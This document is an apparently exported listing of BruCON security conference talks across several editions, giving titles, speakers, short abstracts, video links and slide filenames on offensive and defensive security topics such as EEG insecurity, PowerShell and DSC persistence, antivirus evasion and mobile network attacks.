Brain Waves Surfing - (In)Security in EEG TechnologiesAlejandro HernandezElectroencephalography (EEG) is a non-invasive method for the recording and the study of electrical activity of the brain taken from the scalp. The source of these brain signals is mostly the synapic activity between brain cells (neurons). EEG activity is represented by different waveforms per second (frequencies) that can be used to diagnose or monitor different health conditions such as epilepsy, sleeping disorders, seizures, Alzheimer disease, among other clinical uses. On the other hand, brain signals are used for many other research and entertainment purposes, such as neurofeedback, arts and neurogaming. Nowadays, this technology is being adopted more and more in different industries. A brief introduction of BCIs (Brain-Computer Interfaces) and EEG will be given in order to understand the risks involved in our brain signals processing, storage and transmission. Live demos include the sniffing of brain signals over TCP/IP, MITM attacks to change data on the fly, DoS attacks to shutdown EEG servers as well as flaws in well-known EEG applications when dealing with corrupted EDF (file format) samples. These demos are a first approach to demonstrate that many EEG technologies are prone to common network and application attacks. Finally, best practices and regulatory compliance on digital EEG will be discussed.
https://www.youtube.com/watch?v=oBTEwOZCsHYBruCON 0x07 - Brain Waves Surfing In Security in EEG.pdf
38
Talk
0x07
Levelling Up Security @ Riot GamesMark HillickIn his talk, Mark will be discussing his 2+ years at Riot Games. He will explain: • How the program was assessed • What gaps were identified How the team has closed those gaps • What the team has learned (including successes as well as failures) • Where the Riot InfoSec team is headed Warning: There will be no 0-days in this talk :)
https://www.youtube.com/watch?v=7Y8iLXkyD7wBruCON 0x07 - Levelling Up Security.pdf
39
Talk
0x07
SSO: It's the SAML SAML SituationDavid MortmanIt’s 2015 and single sign on systems have been around for over 15 years now. Despite the years of opportunity SSO is still really hard to do with any level of effectiveness. The advent of federation systems has, if anything, made things even harder. Sure there are standards like SAML which are supposed to help, but SAML options are like Tannenbaum’s line about standards. There are so many to choose from. Basically no two SAML and OAuth wich are supposed to help. I’ll talk about the assorted ways that SSO works and doesn’t work and how fundamental features like Single Log Out are generally not available. I’ll close out with some thoughts on future direction on how we might be able to make things better.
https://www.youtube.com/watch?v=dHq_9D-hD2Y<<MISSING>>
40
Talk
0x07
The .11 Veil, Camouflage & Covert! Invisible WiFi, RevealedRushikesh Nandedkar and Amrita IyerThe concept of invisibility has always been there on the mind of human being. Be that for a good or evil, we hold it for some reason for sure. And so is the reason same thing we try incarnate in the world created by us, the world of technology, the world of binaries. Having this said, to give our bit of contribution towards achieving invisibility on air (IEEE 802.11), we tried understand certain questions. And the answers resolved to the set of approaches we are sharing in this talk. They are as under: 1. Elt Euphoria ( some approach to smuggle data in legit frames ) and its other variant 2. Patch Peloton (the absolute invisibility)
https://www.youtube.com/watch?v=1uwCWL_3ObkBruCON 0x07 - 11 Veil Covert And Camouflage Invisible Wifi Revealed.pdf
41
Keynote
0x07
Keynote - What BASE Jumping Taught Me about RiskShyama RoseThe odds of dying while BASE jumping are dismal: 1 in 6. As a BASE jumper myself who has lost several friends in the sport, I analyze the stark realities of security and risk in terms of life, death, and overall human safety. Both BASE jumping and hacking are fringe, sexy, and dangerous sports. I will discuss what a highly dangerous and deadly sport like BASE jumping has taught me about systematic risk reduction and how companies may be skewing information security risk.https://www.youtube.com/watch?v=p1iiFKUFTgUBruCON 0x07 - What BASE Jumping Taught Me About Risk.pdf
42
Talk
0x07
Nightmares of a PentesterChris NickersonHaving been a Penetration Tester for the last 15+ years I have seen many environments and technologies. I have had the pleasure / hell of testing systems I’ve never even heard of and the agony of defeat on a major scale. Instead of just going over the what we used to work our way in, I want to go over the tricks the BLUE team used to keep us out! We will go over the technologies and techniques that have turned our traditional paths to root from minutes to months and the mistakes that got us “caught” along the way. Not all pentests are a dream and the nightmares CAN / DO happen. So, let’s talk about how YOUR environment can become an attackers worst nightmare instead of their favorite playground.
https://www.youtube.com/watch?v=2ufBtLw6QgYBruCON 0x07 - Nightmare of a Pentester.pdf
43
Talk
0x07
Creating REAL Threat Intelligence ... with EvernoteL. GrecsIn the presentation that threat intel vendors do not want you to see, threat data from open source and home grown resources meets Evernote as the ultimate braindump repository with the outcome of producing real actionable threat intelligence that your organization can leverage to stop the bad guys. This presentation discusses an experiment of using Evernote as a informal threat intelligence management platform, the specific concepts and strategies used, and its overall effectiveness. Specific topics covered include the advantages of using an open and flexible platform that can be molded into an open/ closed source threat data repository, an information sharing platform, and an incident management system. Although using Evernote in this way in large enterprises is probably not possible, organizations can apply the same reference implementation to build similarly effective systems using open source or commercial solutions. And yeah … threat intel vendors still hold a role in ultimate threat intelligence nirvana but there is a lot you should do on your own first in order to better understand your requirements in searching for that ideal partner.
https://www.youtube.com/watch?v=dAWz2YmrKAIBruCON 0x07 - Threat Intel using Evernote.pdf
44
Talk
0x07
Shims For The WinWilli Ballenthin and Jon TomczakOver the past year, targeted attackers have rolled out new persistence mechanisms that evade existing detection technologies. In the past six months, we’ve identified multiple attacks that hijack the Application Compatibility Infrastructure shim databases (SDB) for code injection. This presentation digs deeply into the attacks and techniques for detection. We’ll cover technical details and implementations, specific recommendations for detection, and brand new tools for analysis. We will conclude by teaching you how to use these new investigative methods to detect artifacts of shim persistence in both large and small environments.
https://www.youtube.com/watch?v=wQEnUISOZPIBruCON 0x07 - Shims for the Win.pdf
45
Talk
0x07
Desired state: compromisedRyan Kazanciyan and Matt HastingsDesired State Configuration (DSC) is a core component of Microsoft’s new enterprise management technology that provides unique opportunities for administrators and attackers alike. It’s designed to monitor and maintain the configuration of a set of systems - even over the internet - with no Active Directory required. But in the wrong hands, a creative adversary can hijack DSC as an effective means of command-andcontrol using nothing but PowerShell scripts and built-in Windows features. First, we’ll demonstrate how to use DSC to infect systems and serve as a covert persistence mechanism for malware. We’ll walk through the steps needed to build a remote C2 server that manages compromised systems - and can even re-infect those that have been cleaned - with DSC and a bit of scripting. Our presentation will also highlight other DSC capabilities, such as transferring files or modifying the registry, that can be abused for malicious control of a system. After covering these intrusion scenarios, we’ll tackle the topic from the perspective of a defender or incident responder. We’ll illustrate the signs that DSC might be used on a compromised system, and how to investigate the forensic evidence it leaves behind. Proof-of-concept source code will accompany the presentation and our research.
https://www.youtube.com/watch?v=9zbNgcaf1AwBruCON 0x07 - Desired State Compromised.pdf
46
Talk
0x07
Unified DNS View to Track ThreatsDhia Mahjoub and Thomas MathewA worldwide visibility into DNS traffic below and above the recursive level is important to develop a unified view of the Internet threat landscape. Analyzing traffic patterns below the recursive resolvers allows for the creation of models that analyze client behavior. These models serve as a valuable source of information for investigating potentially new malicious domains. Monitoring authoritative traffic above the resolvers is an excellent source of information for tracking the underlying domain/IP hosting infrastructures for malware campaigns over time. Combining these two different views of the DNS and IP space provides the analyst invaluable intelligence for detecting emerging threats. The objective of this talk is to examine the methods we use at OpenDNS to analyze traffic at both the recursive and authoritative layers. We will present novel algorithms used to help identify traffic signal patterns at the recursive layer. https://www.youtube.com/watch?v=8edBgoHXnwg<<MISSING>>
47
Talk
0x07
Hacking as Practice for Transplanetary Life in the 21st CenturyRichard ThiemeIn my end is my beginning,” said T. S. Eliot in The Four Quartets, and he might have been talking about hacking. Because radical hacking is a state of mind, an approach to life, the universe, everything, a practice that must be understood with humility, explored with persistence, and mastered with grace and a flair for style. It begins in the beginning. In Zen we hear of “beginners’ eyes,” which look with no preconceptions and see clearly what is there. That also means we can distinguish what’s in our own minds, see our perceptual apparatus and distinguish it from what’s “out there.” The boundary where those meet, where we half create and half perceive the reality in which we live, is the fertile area where radical hacking takes place. It’s the brackish tidewater in which new forms of life are evolving. So the future of hacking is in a way already here, a mold for possibility that draws us into itself. Those who allow the future to reach back to them and show them the way look like pioneers, creative geniuses, but really, they’re just hackers. The future may exist, but not as we think it does. It’s not “there” in an objective way, it’s there as a possibility, actualized when we instantiate it. If that sounds like quantum physics, maybe it is: studies testing ESP have detected hits at a rate greater than chance for the next perception, the next event, suggesting the future is already available to us here and now. But another point of view understands “the future” as how we hold ourselves here and now as possibilities for action. What we call the future is a range of possibilities and when we choose one, it happens in the now. And all is always now. Thieme suggests possibilities for hacking aligned with these insights based on his experience. https://www.youtube.com/watch?v=HdpmJZTKZx4<<MISSING>>
48
49
Talk
0x06
One packer to rule them allArne Swinnen and Alaeddine MesbahiLately, many popular Antivirus solutions claim to be the most effective against unknown and obfuscated malware. Most of these solutions are rather vague about how they supposedly achieve this goal, making it hard for end-users to evaluate and compare the effectiveness of the different products on the market. This white-paper presents empirically discovered results on the various implementations of these methods per solution, which reveal that some Antivirus solutions have more mature methods to detect x86 malware than others, but all of them are lagging behind when it comes to x64 malware. In general, at most three stages were identifed in the detection process: Static detection, Code Emulation detection (before execution) and Runtime detection (during execution). New generic evasion techniques are presented for each of these stages. These techniques were implemented by an advanced, dedicated packer, which is an approach commonly taken by malware developers to evade detection of their malicious toolset. Two brand new packing methods were developed for this cause. By combining several evasion techniques, real-world malicious executables with a high detection rate were rendered completely undetected to the prying eyes of Antivirus products.https://www.youtube.com/watch?v=nPmbpBYmLpM<<MISSING>>
50
Keynote
0x06
Keynote - Infosec Life Lessons from Dr. SeussJennifer MinellaJennifer Minella is currently VP of Engineering and Consulting CISO with Carolina Advanced Digital, Inc. With more than 15 years’ experience working in the technology industry, Jennifer’s technical background covers specialized areas of infrastructure security, access control, wireless technologies, and industrial security. Most recently, Mrs. Minella has been involved in executive management of the organization, leading operations in engineering, security, business development and communications. In her engineering role, Jennifer leads strategic research and consulting for government agencies, educational institutions and Fortune 100 and 500 corporations. In addition to her normal business roles, Mrs. Minella is a published author, editorial contributor, and trusted adviser for information security topics to media. Much of Jennifer’s work can be found at her www.SecurityUncorked.com blog site. No stranger to public speaking, she’s presented at RSA Conference, NSA Trusted Computing Conference, Interop, Infosec World, Deep Sec, SecTor, CSI and many other conferences. Mrs. Minella also serves on the international Board of Directors for (ISC)2 where she participates in roles to advance the communications and strategic efforts.Jennifer also serves on the Board of Directors for the (ISC)2 Foundationhttps://www.youtube.com/watch?v=sXU_UE2jrCM<<MISSING>>
51
Talk
0x06
Cyber necromancy - resurrecting the deadMatthew Halchyshak and Joseph Tartarohttps://www.youtube.com/watch?v=VUSfPlrbXPg<<MISSING>>
52
Keynote
0x06
Keynote - Veteran startup CTO and authorAdam ShostackEveryone knows you ought to threat model, but in practical reality it turns out to be tricky. If past efforts to threat model haven’t panned out, perhaps part of the problem is confusion over what works, and how the various approaches conflict or align. This talk captures lessons from years of work helping people throughout the software industry threat model more effectively. It’s designed to help security pros, developers and systems managers, all of whom will leave with both threat modeling lessons from Star Wars and a proven foundation, enabling them to threat model effectively. Adam is a technologist, entrepreneur, author and game designer. He’s a member of the BlackHat Review Board and a principal program manager at Microsoft. He helped found the CVE and many other things. He is the author of “Threat modeling: Designing for Security,” lead designer of Microsoft’s SDL Threat Modeling Tool v3 and the “Elevation of Privilege,” game, the co-author of “The New School of Information Security” and co-designer of “Control-Alt-Hack.https://www.youtube.com/watch?v=-2zvfevLnp4<<MISSING>>
53
Talk
0x06
Biting into the forbidden fruitKrzysztof KotowiczWe all know JS crypto is flawed, right? Over the years, security community has pointed out its multiple fundamental problems. Several arguments were made and “JavaScript cryptography is bound to fail” became a mantra. Of course, despite all this JS crypto WAS used all over the place. In recent months, we tested various high-profle, in the wild crypto libraries, applications and systems. We saw code from home-grown cryptography to full-blown TLS or OpenPGP implementations. Hilarious bugs were spotted, protections were bypassed and systems were pwned. But was it really that different from what we all had already seen in OpenSSL, BouncyCastle or GnuPG? Does it mean that Javascript cryptography can be, secure like any other? During the talk vulns will be shown, authorities - questioned, myths - debunked, and browsers cursed upon. You’ll see the full picture - from XSS, to man-inthe-middle, to PRNGs and timing side-channels, even snippets in C. You’ll be left with an updated, solid and heavily opinionated view of JavaScript cryptography.https://www.youtube.com/watch?v=MYW84YkNG9Y<<MISSING>>
54
Talk
0x06
Stealing a mobile using wormholesMarkus VervierAuthentication in mobile networks is usually done using a secure element which is commonly a SIM-Card. It is a tamper resistant device that should prevent cloning of mobile identities by legitimate users as well as attackers. Mobile network operators as well as most users have an interest in preventing the cloning of a mobile network identity. As the mobile network identity is widely used as authentication factor for online-banking applications and resetting of account-passwords for services at Google, Yahoo and others, protection of the mobile identity is even more important. A widespread assumption is that for successful authentication a SIM card needs to be present in a device. While this assumption might be true in the era before smartphones, it is not valid anymore. Modern day smartphones have a multitude of communication channels besides the mobile network as for example Bluetooth, NFC, WiFi and generally a constant connection to the internet. We call these communication channels Wormholes as they allow data to travel from the mobile device to places that it was never intended to do. In this talk we will learn how to access the SIM-Card on Android phones from a native application without special privileges. Additionally techniques for forwarding GSM and 3G authentication vectors to different devices will be presented. As a special a short walkthrough on analyzing and modifying the baseband frmware of a common class of Android phones will be given.https://www.youtube.com/watch?v=V6_mZyQdEuU<<MISSING>>
55
Talk
0x06
Data transforming your sewage into signaturesAdam Schoeman What happens when you collect a bunch of good data, under good pretences only to realise that the fndings that you were expecting are completely wrong? Before you quit infosec and retreat to a farm, allow me to tell you about how I data transformed my data sewage into useful signatures. This talk will lay some ground work as to how honeypots relate to traditional security controls and how they differ, especially with regards to what they ‘cost’ to run. Then we will look at how a very cheap honeypot can be built, and how value can be derived from its simplistic output. Finally, I will look at how you can fnd further value in large data sets by looking past the obvious and factorising, or transforming the data. Did I mention that there will be drinking involved?https://www.youtube.com/watch?v=M_BppG-wXC8<<MISSING>>
56
Talk
0x06
Thunderbolts and LightningSnarePeople keep talking about Thunderbolt DMA attacks as though they’re a foregone conclusion. Prior to doing this research, we hadn’t seen one that didn’t involve using a Thunderbolt to FireWire adapter. This kind of attack, when performed against current hardware, is subject to the same limitations and mitigations as the FireWire DMA attacks we’ve seen since Kiwicon’s very own Metlstorm winlockpwned his way to fame in 2006. In this talk, snare will discuss the approach that he and rzn took when attacking systems with a Thunderbolt port. Will our heroes triumph over evil, or will they get hit by a bus?https://www.youtube.com/watch?v=epeZYO9qFbs<<MISSING>>
57
Talk
0x06
Security Makes Strange Bedfellows: Using Legal and Procurement To Secure Software Noel Dunne and Paco HopeThe penetration test fnds a bug in the code that was coded four months ago and could have been prevented a year ago during requirements gathering. The vendor says they will fx it shortly after the software launches—if a change order is issued and they’re paid for their work. Many organisations fnd themselves paying for insecure software, paying for a security test, then paying the vendor to fx the software. It’s not just ineffcient, it puts the enterprise and its customers at risk. An organisation’s procurement department, when supplied with the right assistance from security and legal teams, can be a very effective ally in this process. Are you a security person frustrated at vulnerabilities being fxed after they go live because they were caught so late? Are you a developer frustrated at the quality of software provided by a partner? This case study describes how one of the largest online retailers in the UK brought security, legal, and procurement into the same room and established security requirements that become part of the contract with vendors and service providers. When the security team discover issues in the software, procurement can use contractual obligations to require vendors to fx broken software. The result is software that is substantially more secure at the beginning, and a lot more visibility into the partner’s software development lifecycle. We provide a three-step action plan and a framework for engaging legal and procurement in this process.https://www.youtube.com/watch?v=9HejCkjbEEU<<MISSING>>
58
Talk
0x06
Investigating Powershell attacksMatt Hastings and Ryan KazanciyanOver the past two years, we’ve seen targeted attackers increasingly make use of PowerShell to conduct command-and-control in compromised Windows environments. If your organization is running Windows 7 or Server 2008 R2, you’ve got PowerShell 2.0 installed (and on Server 2012, remoting is enabled by default!). This has created a whole new playground of attack techniques for intruders that have already popped a few admin accounts (or an entire domain). Even if you’re not legitimately using PowerShell to administer your systems, you need to be aware of how attackers can enable and abuse its features. This presentation will focus on common attack patterns performed through PowerShell - such as lateral movement, remote command execution, reconnaissance, fle transfer, and establishing persistence - and the sources of evidence they leave behind. We’ll demonstrate how to collect and interpret these forensic artifacts, both on individual hosts and at scale across the enterprise. Throughout the presentation, we’ll include examples from real-world incidents and recommendations on how to limit exposure to these attacks.https://www.youtube.com/watch?v=J7mFCUp3FWA<<MISSING>>
59
Talk
0x06
Using superpowers for hw reverse engineeringJoe GrandSuperpowers, normally used by superheroes in the battle of good versus evil, are also accessible to engineers and hackers in equipment used for failure analysis and verifcation of PCB fabrication and component assembly processes. In this mostly visual presentation, Joe shares his experiences of using lasers, X-rays, and sound waves to aid in the reverse engineering of electronic products and circuit boards.https://www.youtube.com/watch?v=_UDlGnQz0B0<<MISSING>>
60
Talk
0x06
The project of prototype thisJoe Grand and ZozDesigning and building projects is hard. Designing and building projects of things that have never been done before is harder. Designing and building projects of things that have never been done before with the fnancial and time constraints of TV is ridiculous. For 18 months, noted hackers Joe “Kingpin” Grand and Zoz were co-hosts of the show Prototype This on the Discovery Channel International, an engineering entertainment program that followed the real-life design process of a unique prototype every episode. Comprised of an electrical engineer (Joe), a roboticist (Zoz), a material scientist, and special effects guy, we had the major bases covered. A total of thirteen episodes were produced, each with their share of challenges and drama. Sometimes the prototypes worked, sometimes they didn’t, but they all involved interesting hacks and behind-the-scenes stories. Joe and Zoz have never talked about these projects in Europe before... In this very visual presentation, we’ll go through design details and show never-before-seen pictures and videos related to some of our favorite episodes, including the Traffc Busting Truck, Fire Fighter PyroPack, Virtual Sea Adventure, Waterslide Simulator, Flying Lifeguard, and as many more as we have time for. Speaking of time... each of these had to be designed and built in a matter of weeks!https://www.youtube.com/watch?v=FpfGDT-OzcA<<MISSING>>
61
Talk
0x06
Hacking driverless vehiclesZozAre driverless vehicles ripe for the hacking? Autonomous and unmanned systems are already patrolling our skies and oceans and being tested on our streets and highways. Pioneering tests of autonomous vehicles were performed in Europe and all trends indicate these systems are at an inflection point that will show them rapidly becoming commonplace. It is therefore a salient time for a discussion of the capabilities and potential vulnerabilities of these systems. This session will be an informative and amusing look at the current state of civil driverless vehicles and what hackers or other miscreants might do to mess with them. Topics covered will include common sensors, decision profles and their potential failure modes that could be exploited. With this talk Zoz aims to both inspire unmanned vehicle fans to think about robustness to adversarial and malicious scenarios, and to give the paranoid false hope of resisting the robot revolution. The talk will also contain brand new information from conversations with the US Department of Transportation including insights into the new Connected Vehicle and Vehicle To Vehicle Communications programs that may be hacking-relevant well before the adoption of fully autonomous cars and other vehicleshttps://www.youtube.com/watch?v=J4v0ENeV86E<<MISSING>>
62
Talk
0x06
A distributed approach to mobile malware scanningDaan RamanIn this presentation, we will discuss the advantages of a distributed online mobile malware scanning service for Android. To the service, a range of distributed clients can contribute and share malware scanning results. In our proof-of-concept called “ApkScan”, we’ve implemented several clients that analyze Android samples in a distributed manner. Each client combines static and dynamic analysis techniques to get an understanding of the potential maliciousness of an Android application. Each sample can be analyzed in parallel by a number of clients. Scan results generated by these clients can then be requested and further analyzed through an online API which we will introduce and make public during BruCON. Finally, we will present statistics on modern Android malware that has been analyzed by ApkScan over the past year. In that time period, more than 25.000 unique user-submitted and app store samples were analyzed.<<MISSING>>BruCON 0x06 - A distributed approach to mobile malware scanning - Daan Raman.pdf
63
Talk
0x06
Windows Crash Dump ExplorationAaron LemastersThe Microsoft Windows crash dump mechanism is perhaps one of the most crucial undocumented components to have survived the scrupulous eyes of reverse engineers and Windows internals experts for so long. Tucked away discreetly in the bowels of the operating system, the undocumented crash dump stack provides the operating system a powerful, fast and independent I/O path to the boot device used for various internal purposes (crash dump fle generation, hibernation, and fast boot in Windows 8). Microsoft has provided some sparse and vague documentation for selective aspects of the crash dump stack, but only enough to expose the absolute minimum knowledge necessary for kernel driver developers to integrate their software. Past research has revealed that the crash dump driver stack can be manipulated using various bypass techniques to read and write to a mass storage device outside normal operating system use, providing both defensive and offensive use<<MISSING>>BruCON 0x06 - Evolution of crash dump research - Aaron Lemasters.pdf
64
65
Keynote
0x05
Keynote - David MortmanDavid Mortman<<MISSING INFO>>https://www.youtube.com/watch?v=Qzm4YIKmzjk<<MISSING>>
66
Talk
0x05
Geolocation of GSM mobile devicesDavid Perez and Jose Pico Geolocation of mobile devices (MS) by the network has always been considered of interest, for example, to locate people in distress calling an emergency number, and so the GSM standard provides different location services (LCS), some networkbased, and some MS-based or MS- assisted. OK, but what if a third party, without access to the network, was interested in knowing the exact position of a particular MS? Could he or she locate it? In this presentation we will show that this is indeed possible, even if the MS does not want to be found, meaning that the device has all its location services deactivated. We will demonstrate a system we designed and built for this purpose, that can be operated in any standard vehicle, and which can pinpoint the exact location of any target MS in a radius of approximately 2 kilometers around the vehicle. Yet, the main focus of the presentation will not so much be the system itself as it will be the process we followed for its design and implementation. We will describe in detail the many technical difficulties that we encountered along the way and how we tackled them. We believe this can be useful for people embarquing themselves in similar research projects. Obviously, a system like this cannot be demonstrated live in the room (it would be quite illegal), but we will show videos of the different consoles of the system, operating in different environments.
https://www.youtube.com/watch?v=xp_KmAiHN3E<<MISSING>>
67
Talk
0x05
Paint by Numbers vs. MonetRuss GideonPenetration testing came about because of real world attacks. The industry quickly realized that we need to behave like the attackers to learn how to defend against attackers, and thus the penetration testing industry was born. Back then the approach to attacks was very paint by numbers. If an exploit was found it was released in raw format, possibly/probably perfected by others, and released. Our methodologies and detections for defense against these attacks were derived from this type of approach. This approach became very paint by numbers! The initial training
on this concept was derived from real world attacks, and we have evolved that training but stopped a few years ago that quick mimicking the real attackers. Why did we do this? It isn’t because as an industry we didn’t want to advance it but it was because it became very difficult to. Why so difficult, because the times have changed, and people are not just giving out thing like they used to. Attackers don’t take that approach. They find a vulnerability/exploit and treat it very special, they understand it, they research all aspects of it, and then they weaponize it. This approach takes time and money and takes a Monet. Yes there are plenty of lookalike Monet paintings, but none have the brush stroke characteristics that true Monet paintings do. Are current approach to detecting and resembling real attacks is still very paint by numbers. Our commercial off-the-shelf tools are great tools, and can help something look like a Monet, but when you look at the brush strokes you can see it is a paint by numbers. We will be reviewing some Tactics, Techniques, and Procedures (TTP) scenarios from real world attacks and showing the not so common differences between true attacker TTPs and current penetration testing methodologies, TTPs, and tools. This talk will focus on the binary aspects of these scenarios to show significant differences and some similarities of current attack patterns. This presentation is designed to show viewers the very low level details that we are overlooking in how to replicate true malicious attackers.This common trend to use off-the-shelf tools to conduct penetration tests has replaced a significant amount of tool writing which has and will help the industry, but this has come at an expense as well.
https://www.youtube.com/watch?v=rMm6_GF_i_E<<MISSING>>
68
Talk
0x05
Data-plane networkingRobert GrahamHigh-speed network design separates components into a “fast-path” and a “slow-path”. And example might be “software defined networks”, where software controls how a switch forwards network traffic. One set of terminology calls this the “data-plane” and “control-plane”. This is a great metaphor for cybersecurity. The “data-plane” is exposed to hackers, and must withstand constant hacker attack while keeping up with link speed traffic. The “control-plane” is hidden from hacker attack, using firewalls or non-routable IP
addresses. My DNS server is a “data-plane” DNS. It’s based upon an in-memory table that’s lost due to power outage. It doesn’t store information on a SQL server with transaction logging. Because of this, it can be 10x or even 100x as fast. This is a great attribute for the “data-plane”, but a horrible attribute for the “control-plane”. It’s role is to be a “slave” to a “hidden master” server running software like BIND10. The design proposed by this talk is that all DNS should consist of slave DNS servers exposed to the Internet, and that all primary master servers should be hidden from the Internet. From a DNS point of view, I’ll show how UPDATE, NOTIFY, and AXFR/IXFR mechanisms work to maintain this structure. This idea isn’t necessarily new, it’s just that it hasn’t been formalized. People already use caching front-ends for hidden webservers, or separate 10.x.x.x private networks for controlling their public infrastructure routers. The purpose of this talk is to provide a more formal, rigorous discussion of this idea. For example, I’ll demonstrate how the custom TCP/IP stack in my DNS server that bypasses the operating-system stack serves this “data plane” purpose.
https://www.youtube.com/watch?v=cYPmbrsvfxwBruCON 0x05 - Data Plane Networking.pptx
69
Keynote
0x05
Keynote - Dan GuidoDan GuidoDan Guido leads the strategic vision for Trail of Bits products and services and manages its day-to-day operations. His most recent research applied intelligencedriven defense to mass malware and demonstrated that, contrary to popular belief, only a very small number of vulnerabilities are used in these massive exploitation campaigns. Prior to Trail of Bits, Dan was a Senior Security Consultant at iSEC Partners where he provided application security and incident response services to a wide variety of clients in the technology, finance, and media industries. Previously, Dan has worked for the Federal Reserve System where he proposed and developed a centralized function for threat intelligence; a team that used its expert knowledge of attacks in the wild to develop sophisticated, enterprise strategies to mitigate them. In addition to his professional work, Dan is a Hacker in Residence at NYU-Poly where he oversees student research and teaches classes in Application Security and Vulnerability Analysis.
https://www.youtube.com/watch?v=z9UfoAyje-4BruCON 0x05 - EIP Revisited.pptx
70
Talk
0x05
Building Custom Android Malware for Penetration TestingStephan ChenetteIn this presentation Stephan will discuss some recent research that emerged he was asked to build malicious applications that bypassed custom security controls. He will walk through some of the basics of reversing malicious apps for android as well as common android malware techniques and methodologies. From the analysis of the wild android malware, he will discuss techniques and functionality to include when penetration testing against 3rd-party android security controls.
https://www.youtube.com/watch?v=aeBEYl_vCFw<<MISSING>>
71
Talk
0x05
CobraDroidJake Valletta“What does this application do?” is a question that analysts often ask themselves when performing an application assessment or analyzing mobile malware. CobraDroid was designed to answer this question. CobraDroid is a full-featured Android sandbox that includes the ability to modify device and radio identifiers, proxy network traffic with SSL validation bypassing, and perform per application method hooking, alerting, and packet capturing (and more!). This talk discusses how CobraDroid can be used for Android malware analysis and application assessments. It will include a discussion of the techniques used to assess applications and a demonstration of the tool. https://www.youtube.com/watch?v=ZcupwSdKNssBruCON 0x05 - CobraDroid.pptx
72
Talk
0x05
Realtime analysis and visualization of internet status, from malware to compromised machines
Tiago Balgan Henriques, Tiago Martins, João GouveiaNowadays, nearly everyday we see a new botnet going up and another one being brought down, looking at this fact the presenters of this talk decided that they needed a way to constantly know and visualize different botnet status. Then we decided we needed to go one step further, and, not only understand how they were growing or shrinking, but to also capture patterns between the different machines that have been compromised and multiple proprieties of different botnets: • Which port(s) does a certain botnet use? • Which type of protocol? • What type of machine is it? • Is it a personal machine or a gateway with multiple machines behind it? • Is that machine affected by one or more botnets? After we achieved this, we decided to create a fast and useful way to use this data, so we created what we call The Cyberfeed and Project Hyperion, which we will also be doing live demos of. On the cyberfeed side you can access all of our data of all types from sinkholes, to portscans, and even honeypots and do different types of queries, allowing you to access only the data you need and want, combining all this it can provide you with useful information that can even be used in defense. On Hyperion, is where our visual modules are located, you can easily get visual geospatial information about different botnets and search for information on our portscans.https://www.youtube.com/watch?v=EokTL29P9poBruCON 0x05 - Realtime analysis and visualization of internet status, from malware to compromised machines.pptx
73
Devops Panel
0x05
Devops PanelSecurity/Ops Memeage: Fitting DevOps, Lean, Risk, Metrics and ITIL/Six Sigma Together. We’ve assembled an all-star team of experts in DevOps, Lean, Risk and Metrics to tell you how they can be used (and abused) for the sake of security. You’ll learn how they are not at odds with each other but in fact are greater then the sum of their parts. You’ll be entertained and also well fed as the panel will bring pastries for audience questions.https://www.youtube.com/watch?v=tngBElRQ1fY<<MISSING>>
74
Talk
0x05
.NET: The Framework, the Myth, the LegendAloria.NET has been around forever, yet the amount of tutorials and documentation covering its analysis is rather diffuse. It’s time to give it the beatdown it deserves. This talk will cover the current state of the art in .NET reversing, down from PE format of .NET assemblies through various types of obfuscation, and into reversing tools and techniques. Finally, we’ll demo how to modify the behavior of an obfuscated .NET binary by injecting new code.https://www.youtube.com/watch?v=nGvhdaZn1zkBruCON 0x05 - NET The Framework the Myth the Legend.pptx
75
Talk
0x05
Taking the BDSM out of PCI-DSS through open-source solutionsErin Jacobs and Zack FaselAt some point as information security practitioners, we all face those god-awful three letters. PCI. Yes. It sucks, it’s not cheap, and Yes, It’s not “real security”. But if you or your client is handling cardholder information, you must SUBMIT! Err... comply....
with over 200 requirements. But how does a technically-minded and security-driven badass meet the letter and intent of PCI without pulling their hair out, spending thousands on vendor solutions that don’t provide holistic security, upsetting management, nor just “check the box” and move on? Zack and Erin will explore their tried and tested open source solutions implemented by organizations from the small/mid-sized to some of the largest providers in the world to address the requirements of PCI DSS while substantially improving security. This isn’t your grandpa’s high-level theoretical overview, but a deep technical dive with specific configuration guidelines you can implement tomorrow. You too can better devote resources to skilled talent over ineffective or exorbitantly priced products and let’s start fixing things.
https://www.youtube.com/watch?v=IEBa2lQ6aQABruCON 0x05 - Taking the BDSM out of PCI-DSS through open-source solutions.pptx
76
Keynote
0x05
Keynote - Amelia AndersdotterAmelia AndersdotterIt's worthwhile to speak about regulating the internet
and what law means to begin with. I would argue that laws are useful, if
they help society resolve conflicts.

I would also argue that we already do regulate the internet, through
copyright law, and that the very idea that we didn't regulate internet
in the past is strange. Copyright law case law has taken some time to
catch up, but essentially the machinery was always working. However
copyright law is not so useful, because on the internet is creates a lot
more conflicts than it solves.

Telecommunications laws we have of course had for a long time.
University networks have been built with public money, so that's been
some form of "public policy" actually. Telcos are obviously regulated
and have always been, albeit in different ways at different times.

Even in privacy laws, we have essentially had the legislations in many
European countries since the 1970s. The first Swedish privacy law is
from 1973. It was made a European standard through the 1995 directive,
and now we are discussing the data protection regulation which speaks
clearly of "privacy by design" - a sort of information society service
regulation. We want services that fulfill our requirements on a legal as
well as on a technical level. The legal level is there to ensure that
accountability and responsibility exists, and as a form of industrial
policy.
https://www.youtube.com/watch?v=6YUjWFjAyTI<<MISSING>>
77
Talk
0x05
HTTP Time BanditVaagn ToukharianWhile web applications become richer and provide higher levels of user experiences, those run increasingly larger amounts of code on both server and client side. Few of the pages on the web server may be the performance bottlenecks. Identifying
those pages gives both the application owner as well as an attacker a chance to be more efficient in performance or attack. We will discuss a method of identifying the weakness of the web Application by performing series of regular requests to it. With some refinements and data normalizations performed on the gathered data, and then performing more testing based on the later it is possible to pinpoint to single most resource(CPU or DB) consuming page of the application. Armed with that information it is possible to perform more efficient DOS/DDOS attacks with very simple tools. The presentation will be accompanied with a few demos of the tool performing testing and attacking on various targets. The tool will be published for the interested researches to play with.
https://www.youtube.com/watch?v=nZc_hiv6sO8BruCON 0x05 - http time bandit.pdf
78
79
Keynote
0x04
Founder and senior security consultant with InGuardiansEd SkoudisWith the onslaught of recent headlines containing revelations of nation-state activity in computer attacks, a lot of people are wondering: What the heck is going on? Although controversial in some quarters, the militarization of cyber space proceeds apace. Some think that military operations in cyber space are impossible, impractical, or just plain evil. In this lively and hard-hitting presentation, Ed Skoudis will analyze the trends and look at where such activities may be heading. We'll then focus on some of the ramifications for the hacker community. How could cyber military action impact you and your hacking research? What steps should hackers take to prepare for a significantly more militarized cyber space? We'll discuss those issues, and many more. <<MISSING>>BruCON 0x04 - Unleashing The Dogs of Cyberwar.pptx
80
Keynote
0x04
